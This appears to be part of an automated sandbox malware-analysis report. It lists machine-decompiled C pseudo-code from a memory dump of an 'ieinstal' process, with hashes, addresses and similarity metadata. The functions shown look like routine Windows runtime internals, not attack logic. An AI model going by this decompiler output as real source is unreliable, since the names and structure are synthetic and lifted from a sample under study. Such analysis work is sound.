                                                            • Opcode ID: 1acaafce1983906f50e8ea917ebff5c82db2bba246fc434d2d322453a8f52ae4
                                                            • Instruction ID: 59e4ea089cea0fb03ad86e7b94f0723aedaf403acecc3dd243d8bcad93e45057
                                                            • Opcode Fuzzy Hash: 1acaafce1983906f50e8ea917ebff5c82db2bba246fc434d2d322453a8f52ae4
                                                            • Instruction Fuzzy Hash: EF216A79501742CFC704DF25C892A18FBF2FF95355B60876AE1148BF98EB31AA82CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ECD46A7 Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 93%
                                                            			E1ECD46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L1EC74620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E1EC9F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E1EC8D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L1EC777F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                            0x1ecd46b7
                                                            0x1ecd46ba
                                                            0x1ecd46c5
                                                            0x1ecd46c8
                                                            0x1ecd46d0
                                                            0x1ecd46d4
                                                            0x1ecd46e6
                                                            0x1ecd46e9
                                                            0x1ecd46f4
                                                            0x1ecd46ff
                                                            0x1ecd4705
                                                            0x1ecd4706
                                                            0x1ecd470c
                                                            0x1ecd4713
                                                            0x1ecd471b
                                                            0x1ecd4723
                                                            0x1ecd4725
                                                            0x1ecd46d6
                                                            0x1ecd46d9
                                                            0x1ecd46db
                                                            0x1ecd46db
                                                            0x1ecd4732

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                            • Instruction ID: bbf91b043ba801ac565547f47affb93fc948453a1d526baa2572620e6578753b
                                                            • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                            • Instruction Fuzzy Hash: 66110276904248BBC7058F5D98808BEFBB9FF85310F10816AFA44C7350DA329D55D3A4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC82397 Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 34%
                                                            			E1EC82397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x1ed4848c != 0) {
					L1EC7FAD0(0x1ed48610);
					if( *0x1ed4848c == 0) {
						E1EC7FA00(0x1ed48610, _t19, _t27, 0x1ed48610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E1EC82581(0x1ed48610, 0x1ec350a0, _t26, _t27, _t28);
						E1EC7FA00(0x1ed48610, 0x1ec350a0, _t27, 0x1ed48610);
					}
				} else {
					L1:
					_t11 =  *0x1ed48614; // 0x1
					if(_t11 == 0) {
						_t11 = E1EC94886(0x1ec31088, 1, 0x1ed48614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E1EC82581(0x1ed48610, (_t11 << 4) + 0x1ec35070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                            0x1ec823b0
                                                            0x1ec823b6
                                                            0x1ec82409
                                                            0x1ec82415
                                                            0x1ecc5ae9
                                                            0x00000000
                                                            0x1ec8241b
                                                            0x1ec8241b
                                                            0x1ec8241d
                                                            0x1ec82427
                                                            0x1ec8242e
                                                            0x1ec82430
                                                            0x1ec82430
                                                            0x1ec823b8
                                                            0x1ec823b8
                                                            0x1ec823b8
                                                            0x1ec823bf
                                                            0x1ec823fc
                                                            0x1ec823fc
                                                            0x1ec823c1
                                                            0x1ec823c3
                                                            0x1ec823d0
                                                            0x1ec823d8
                                                            0x1ec823d8
                                                            0x1ec823dc
                                                            0x1ec823de
                                                            0x1ec823e1
                                                            0x1ec823e1
                                                            0x1ec823ec

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a06d9fa42dc1c53fdcc00957971185ea94cda8495189afd23c84f14568cb4b4b
                                                            • Instruction ID: 5a94d9ad574e4b155ac01e6cc79d4404adaea3d3373ec52f09a17fe9288e9139
                                                            • Opcode Fuzzy Hash: a06d9fa42dc1c53fdcc00957971185ea94cda8495189afd23c84f14568cb4b4b
                                                            • Instruction Fuzzy Hash: 93116B3A6003906BD3248A2B9DD4F09F2CFABB0E65F144726F54197780DE70E841C754
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC937F5 Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 87%
                                                            			E1EC937F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E1EC72280(_t6, 0x1ed48550);
				}
				_t29 = E1EC9387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E1EC6FFB0(0x1ed48550, _t27, 0x1ed48550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                            0x1ec937fa
                                                            0x1ec937fc
                                                            0x1ec93805
                                                            0x1ec93808
                                                            0x1ec93808
                                                            0x1ec93814
                                                            0x1ec93818
                                                            0x1ec93846
                                                            0x1ec93848
                                                            0x1ec9384b
                                                            0x1ec9384b
                                                            0x1ec93852
                                                            0x00000000
                                                            0x1ec93854
                                                            0x1ec93856
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec93863
                                                            0x00000000
                                                            0x1ec93863
                                                            0x1ec9381a
                                                            0x1ec9381a
                                                            0x1ec9381f
                                                            0x1ec9386e
                                                            0x1ec9386e
                                                            0x1ec93871
                                                            0x1ec93873
                                                            0x1ec93873
                                                            0x1ec93868
                                                            0x00000000
                                                            0x1ec93868
                                                            0x1ec93821
                                                            0x1ec93826
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec93828
                                                            0x1ec9382a
                                                            0x1ec93841
                                                            0x00000000
                                                            0x1ec93841

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a179c339ab6d7fc4a5b2c7bb65aef127c5e302c8c076677e29229559f3763284
                                                            • Instruction ID: 903157f5617ea40e16ff12d55cb8701b29b1cf4570b41a46ba0d8d78e72e927f
                                                            • Opcode Fuzzy Hash: a179c339ab6d7fc4a5b2c7bb65aef127c5e302c8c076677e29229559f3763284
                                                            • Instruction Fuzzy Hash: 1A0104B2A017919BC3278A1E9D40A1E7BE7DF85B60711566AE4458B708CB38D801D784
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC5C962 Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 42%
                                                            			E1EC5C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x1ed4d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E1EC6EEF0(0x1ed470a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E1ECDF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E1EC6EB70(_t29, 0x1ed470a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E1EC9B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E1ECDF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x1ed470c0; // 0x0
					while(_t38 != 0x1ed470c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x1ed4b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                            0x1ec5c96a
                                                            0x1ec5c974
                                                            0x1ec5c988
                                                            0x1ec5c98a
                                                            0x1ecc7c9d
                                                            0x1ecc7c9f
                                                            0x1ecc7ca4
                                                            0x1ecc7cae
                                                            0x1ecc7cf0
                                                            0x1ecc7cf5
                                                            0x1ecc7cfa
                                                            0x1ec5c992
                                                            0x1ec5c996
                                                            0x1ec5c997
                                                            0x1ec5c998
                                                            0x1ec5c9a3
                                                            0x1ec5c9a3
                                                            0x1ecc7cb0
                                                            0x1ecc7cb7
                                                            0x1ecc7cbb
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc7cbd
                                                            0x1ecc7ce8
                                                            0x1ecc7cc5
                                                            0x1ecc7cc8
                                                            0x1ecc7cca
                                                            0x1ecc7cd0
                                                            0x1ecc7cd6
                                                            0x1ecc7cde
                                                            0x1ecc7ce4
                                                            0x1ecc7ce4
                                                            0x1ecc7cd0
                                                            0x00000000
                                                            0x1ecc7ce8
                                                            0x1ec5c990
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1bba6cf1fc80a3d1425caa112075ec1d3a1638e56fccb02a668cad5ca110b409
                                                            • Instruction ID: a4177581c5302c9c4d4cc47c96eab307a9557baff8b7a1b3fdf31a94c0731f87
                                                            • Opcode Fuzzy Hash: 1bba6cf1fc80a3d1425caa112075ec1d3a1638e56fccb02a668cad5ca110b409
                                                            • Instruction Fuzzy Hash: BA11A9326106879BC7059E3ACC84A5BB7A6FF98210B110B29F94283A90EF20AD55CBD1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC8002D Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E1EC8002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E1EC77D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E1EC77D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E1EC77D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E1EC77D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                            0x1ec80032
                                                            0x1ec80037
                                                            0x1ec80043
                                                            0x1ecc4b3a
                                                            0x1ec80049
                                                            0x1ec80049
                                                            0x1ec80049
                                                            0x1ec8004e
                                                            0x1ec80053
                                                            0x1ecc4b48
                                                            0x1ecc4b5a
                                                            0x1ecc4b4a
                                                            0x1ecc4b53
                                                            0x1ecc4b53
                                                            0x1ecc4b5f
                                                            0x00000000
                                                            0x1ecc4b61
                                                            0x00000000
                                                            0x1ecc4b61
                                                            0x1ec80059
                                                            0x1ec80059
                                                            0x1ec80060
                                                            0x1ecc4b6f
                                                            0x1ecc4b6f
                                                            0x1ec80069
                                                            0x1ecc4b83
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc4b90
                                                            0x1ecc4b9b
                                                            0x1ecc4b9b
                                                            0x1ecc4ba4
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc4baa
                                                            0x00000000
                                                            0x1ec8006f
                                                            0x1ec8006f
                                                            0x00000000
                                                            0x1ec8006f
                                                            0x1ec80069

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                            • Instruction ID: 81fe3dc42c27eb7368bebab7ff6595321d873d790493e62452fbf1d1581865b7
                                                            • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                            • Instruction Fuzzy Hash: 99110433A11AC28FE3028726CE65B56B7D7BF41758F0902A0DE24C7696E728D841C360
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC6766D Relevance: .1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 94%
                                                            			E1EC6766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E1EC8F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E1EC8F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L1EC74620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                            0x1ec67672
                                                            0x1ec6767f
                                                            0x1ec67689
                                                            0x1ec676de
                                                            0x1ec676de
                                                            0x1ec6768b
                                                            0x1ec67691
                                                            0x1ec67693
                                                            0x1ec67697
                                                            0x00000000
                                                            0x1ec67699
                                                            0x1ec676a8
                                                            0x00000000
                                                            0x1ec676aa
                                                            0x1ec676ad
                                                            0x1ec676b1
                                                            0x00000000
                                                            0x1ec676b3
                                                            0x1ec676b3
                                                            0x1ec676b5
                                                            0x1ec676ba
                                                            0x1ec676bc
                                                            0x1ec676bc
                                                            0x1ec676c0
                                                            0x00000000
                                                            0x1ec676c2
                                                            0x1ec676ce
                                                            0x1ec676ce
                                                            0x1ec676c0
                                                            0x1ec676b1
                                                            0x1ec676a8
                                                            0x1ec67697
                                                            0x1ec676d9

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                            • Instruction ID: b7862e03c40b5cea20df5f12ef84e25abe13e88eb5d86c0ffea6c8d45cc7a0b8
                                                            • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                            • Instruction Fuzzy Hash: 66018832701159ABD7109E5ECE91E5FB7EDEF88660B150B24B908CB354EA30DD4187A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC59080 Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 69%
                                                            			E1EC59080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x1ed485ec;
				E1EC72280(_t48, 0x1ed485ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E1EC6FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x1ed4538c; // 0x2ef9b68
					if( *_t84 != 0x1ed45388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x1ed2f6e8);
						E1ECAD0E8(0x1ed485ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E1ED288F5(_t80, _t85, 0x1ed45388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x1ed486c0; // 0x2e507b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x1ed486b8; // 0x2ebb6e0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E1EC72280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E1ED288F5(0x1ed485ec, _t85, 0x1ed45388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E1EC9AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x1ed4b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x1ed484c0;
																			if(_t82 >=  *0x1ed484c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E1ED29063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E1EC5922A(_t99);
										_t64 = E1EC77D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E1ED28B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x1ed486c0; // 0x2e507b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x1ed486b8; // 0x2ebb6e0
												if(__eflags == 0) {
													_t94 = 0x1ed486bc;
													_t87 = 0x1ed486b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E1EC59240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x1ed486c4;
												_t87 = 0x1ed486c0;
												L27:
												E1EC89B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E1ECAD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1ed45388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x1ed4538c = _t51;
						goto L6;
					}
				}
			}




















                                                            0x1ec59082
                                                            0x1ec59083
                                                            0x1ec59084
                                                            0x1ec59085
                                                            0x1ec59087
                                                            0x1ec59096
                                                            0x1ec59098
                                                            0x1ec59098
                                                            0x1ec5909e
                                                            0x1ec590a8
                                                            0x1ec590e7
                                                            0x1ec590e7
                                                            0x1ec590aa
                                                            0x1ec590b0
                                                            0x1ec590b7
                                                            0x1ec590bd
                                                            0x1ec590dd
                                                            0x1ec590e6
                                                            0x1ec590bf
                                                            0x1ec590bf
                                                            0x1ec590c7
                                                            0x1ec590cf
                                                            0x1ec590f1
                                                            0x1ec590f2
                                                            0x1ec590f4
                                                            0x1ec590f5
                                                            0x1ec590f6
                                                            0x1ec590f7
                                                            0x1ec590f8
                                                            0x1ec590f9
                                                            0x1ec590fa
                                                            0x1ec590fb
                                                            0x1ec590fc
                                                            0x1ec590fd
                                                            0x1ec590fe
                                                            0x1ec590ff
                                                            0x1ec59100
                                                            0x1ec59102
                                                            0x1ec59107
                                                            0x1ec5910c
                                                            0x1ec59110
                                                            0x1ec59113
                                                            0x1ec59115
                                                            0x1ec59136
                                                            0x1ec5913f
                                                            0x1ec59143
                                                            0x1ecb37e4
                                                            0x1ecb37e4
                                                            0x1ec59117
                                                            0x1ec59117
                                                            0x1ec5911d
                                                            0x00000000
                                                            0x1ec5911f
                                                            0x1ec5911f
                                                            0x1ec59125
                                                            0x00000000
                                                            0x1ec59127
                                                            0x1ec5912d
                                                            0x1ec59130
                                                            0x1ec59134
                                                            0x1ec59158
                                                            0x1ec5915d
                                                            0x1ec59161
                                                            0x1ec59168
                                                            0x1ecb3715
                                                            0x1ec5916e
                                                            0x1ec5916e
                                                            0x1ec59175
                                                            0x1ec59177
                                                            0x1ec5917e
                                                            0x1ec5917f
                                                            0x1ec59182
                                                            0x1ec59182
                                                            0x1ec59187
                                                            0x1ec59187
                                                            0x1ec5918a
                                                            0x1ec5918d
                                                            0x1ec5918f
                                                            0x1ec59192
                                                            0x1ec59195
                                                            0x1ec59198
                                                            0x1ec59198
                                                            0x1ec59198
                                                            0x1ec5919a
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb371f
                                                            0x1ecb3721
                                                            0x1ecb3727
                                                            0x1ecb372f
                                                            0x1ecb3733
                                                            0x1ecb3735
                                                            0x1ecb3738
                                                            0x1ecb373b
